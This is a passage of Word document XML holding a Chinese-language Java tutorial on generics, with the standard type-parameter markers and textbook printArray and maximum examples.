        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型参数能被用来声明返回值类型，并且能作为泛型方法得到的实际参数类型的占位符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BF7D0" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型方法体的声明和其他方法一样。注意类型参数只能代表引用型类型，不能是原始类型（像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE9911" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中泛型标记符：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2E4FC" w14:textId="77777777" w:rsidR="005617C5" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A78026" w14:textId="77777777" w:rsidR="005617C5" w:rsidRPr="00844FB1" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>E - Element (</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在集合中使用，因为集合中存放的是元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBFB29" w14:textId="77777777" w:rsidR="005617C5" w:rsidRPr="00844FB1" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>T - Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F2711" w14:textId="77777777" w:rsidR="005617C5" w:rsidRPr="00844FB1" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>K - Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（键）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A827A" w14:textId="77777777" w:rsidR="005617C5" w:rsidRPr="00844FB1" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>V - Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384C7137" w14:textId="77777777" w:rsidR="005617C5" w:rsidRPr="00844FB1" w:rsidRDefault="005617C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>N - Number</w:t>
      </w:r>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（数值类型）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C791A" w14:textId="2CFD1525" w:rsidR="00CE036E" w:rsidRDefault="00335DBB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00844FB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="005617C5" w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="005617C5" w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表示不确定的</w:t>
      </w:r>
      <w:r w:rsidR="005617C5" w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> java </w:t>
      </w:r>
      <w:r w:rsidR="005617C5" w:rsidRPr="00844FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A8612B" w14:textId="3139B2D4" w:rsidR="00CE036E" w:rsidRDefault="00CE036E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8E3CF2" w14:textId="3127928F" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：使用泛型方法打印不同类型的数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055824AF" w14:textId="07EB12E5" w:rsidR="00344EB3" w:rsidRDefault="00344EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A580CC4" w14:textId="77777777" w:rsidR="00F24298" w:rsidRDefault="00F24298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B9259B" w14:textId="5F18E12D" w:rsidR="00F24298" w:rsidRDefault="00F24298" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>:Element(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在集合中使用，因为集合中存放的是元素</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C32A1" w14:textId="2EEE8D8D" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class GenericMethodTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F08C1" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFABC8" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> printArray                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDDF11" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static </w:t>
      </w:r>
      <w:r w:rsidRPr="00485B6F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt; E &gt; void printArray( E[] inputArray )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316346A0" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48992B7C" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出数组元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37261933" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         for ( E element : inputArray ){        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA19B9C" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            System.out.printf( "%s ", element );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB8099" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE127A7" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB02BD" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564FB08" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF2ABD" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main( String args[] )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31175D6B" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686793A8" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建不同类型数组：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integer, Double </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898804D" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Integer[] intArray = { 1, 2, 3, 4, 5 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EF5DF" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Double[] doubleArray = { 1.1, 2.2, 3.3, 4.4 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB3511" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Character[] charArray = { 'H', 'E', 'L', 'L', 'O' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FAAD7" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9AF87" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println( "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整型数组元素为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:" );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFBB71" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        printArray( intArray  ); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递一个整型数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC69905" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE92CC9" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println( "\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双精度型数组元素为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:" );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67EEF0" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        printArray( doubleArray ); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递一个双精度型数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014657D1" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A38C53" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println( "\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符型数组元素为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:" );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B03C0" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        printArray( charArray ); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递一个字符型数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DBB98B" w14:textId="77777777" w:rsidR="00813F85" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31AC4F" w14:textId="4F6A0474" w:rsidR="00CE036E" w:rsidRDefault="00813F85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52868A8A" w14:textId="0E7DA99A" w:rsidR="00813C16" w:rsidRDefault="00813C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1629DC0B" w14:textId="4DD7D038" w:rsidR="002E7808" w:rsidRDefault="002E7808" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002E7808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E027C8" w14:textId="0362C4EE" w:rsidR="00813C16" w:rsidRDefault="00813C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68164F31" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class MaximumTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8FB0B" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3B296" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较三个值并返回最大值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16D2F3" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public </w:t>
      </w:r>
      <w:r w:rsidRPr="00344EB3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static &lt;T extends Comparable&lt;T&gt;&gt; T maximum(T x, T y, T z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA77F6E" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   {                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D07FEA" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      T max = x; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是初始最大值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C83603" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if ( y.compareTo( max ) &gt; 0 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CCCA42" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         max = y; //y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更大</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B783685" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD05F6A" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if ( z.compareTo( max ) &gt; 0 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE929D7" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         max = z; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7101E" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45324835" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      return max; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回最大对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508F617" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5AC38" w14:textId="77777777" w:rsidR="00485B6F" w:rsidRDefault="00485B6F" w:rsidP="009222EB">
      <w:pPr>
